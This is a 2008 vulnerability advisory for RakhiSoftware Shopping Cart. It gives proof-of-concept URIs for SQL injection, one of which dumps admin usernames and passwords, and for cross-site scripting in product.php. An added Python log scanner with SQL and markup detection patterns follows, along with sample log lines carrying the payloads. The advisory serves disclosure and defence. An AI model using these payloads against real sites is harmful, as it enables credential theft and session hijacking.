

Title RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
Published 2008-11-28-12:00AM
Updated 2008-12-02-10:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Charalambous Glafkos
Vulnerable  RakhiSoftware Shopping Cart 0
Not Vulnerable  
Code  Attackers can exploit the issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URIs and proof of concept are available:

http://www.example.com/rjbike_new/product.php?category_id=1+union%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin--&subcategory_id=1

http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(1949308870);</script>&subcategory_id=1

http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>'><script>alert(1949308870);</script>

Set Cookie: PHPSESSID='
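A log check for the two parameters named in the advisory, as an added example (not part of the original advisory or the vendor's code): it flags product.php requests whose category_id or subcategory_id is not a plain integer. It assumes combined-format access logs and that both parameters are numeric ids in normal use; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names; assumed here to be numeric ids in normal use.
ID_PARAMS = ("category_id", "subcategory_id")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d(?:\.\d)?"')
SQL_HINT = re.compile(r"\bunion\b|\bselect\b|\bconcat\s*\(|--", re.I)
MARKUP_HINT = re.compile(r"[<>'\"]")

def classify(value):
    """Return None for a plain decimal id, otherwise a short reason string."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    if SQL_HINT.search(value):
        return "sql-syntax"
    if MARKUP_HINT.search(value):
        return "markup"
    return "non-numeric"

def scan(log_lines):
    """Return (line_number, parameter, reason) for suspicious product.php requests."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/product.php"):
            continue
        # parse_qs percent-decodes and turns "+" into a space, as PHP does.
        params = parse_qs(target.query, keep_blank_values=True)
        for name in ID_PARAMS:
            for value in params.get(name, []):
                reason = classify(value)
                if reason:
                    findings.append((number, name, reason))
    return findings

# Constructed sample lines in combined log format (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Nov/2008:10:00:01 +0000] "GET /rjbike_new/product.php?category_id=1&subcategory_id=1 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [28/Nov/2008:10:00:07 +0000] "GET /rjbike_new/product.php?category_id=1+union%20select%201,2,3--&subcategory_id=1 HTTP/1.1" 200 4830',
    '192.0.2.12 - - [28/Nov/2008:10:00:09 +0000] "GET /rjbike_new/product.php?category_id=1&subcategory_id=%3E%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5290',
    '192.0.2.13 - - [28/Nov/2008:10:00:12 +0000] "GET /rjbike_new/index.php?category_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, applied to both parameters before they reach a query or the page output, is the corresponding server-side fix for an input validation error of this class.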



Copyright 2007, SecurityDot
Sun, 05 Jul 2009 00:14:29 +0000
